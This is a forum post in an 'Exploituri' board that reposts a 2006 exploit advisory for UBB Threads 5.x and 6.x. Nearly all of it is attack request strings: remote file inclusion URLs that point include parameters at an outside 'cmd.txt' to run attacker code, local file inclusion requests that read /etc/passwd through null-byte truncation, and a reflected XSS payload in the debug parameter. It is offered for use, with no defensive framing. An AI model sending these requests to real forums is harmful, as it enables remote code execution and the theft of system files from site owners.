Jump to content
MadBadSad

UBB Threads 5.x / 6.x Multiple Remote File Inclusion Vuln !

By MadBadSad, in Exploituri

Recommended Posts

MadBadSad Newbie

MadBadSad

Posted
Posted

UBBThreads 5.x,6.x Multiple File Inclusion Vulnerabilities

Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com

This exploits works on UBBThreads 5.x,6.x

Original advisory can be found at: http://www.nukedx.com/?viewdoc=40

Succesful exploitation register_globals on

Version 6.x

GET -> http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=[FILE]

EXAMPLE -> http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=../../../../../etc/passwd%00

GET -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=[FILE]

EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=http://yoursite.com/cmd.txt?

EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=/etc/passwd%00

If php version < 4.1.0 or UBB version <= 5.x

GET -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=[FILE]

EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=http://yoursite.com/cmd.txt?

EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=/etc/passwd%00

XSS:

GET -> http://[site]/[ubbpath]/index.php?debug=[XSS]

EXAMPLE -> http://[site]/[ubbpath]/index.php?debug=<script>alert();</script>

# nukedx.com [2006-05-27]

# milw0rm.com [2006-05-28]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...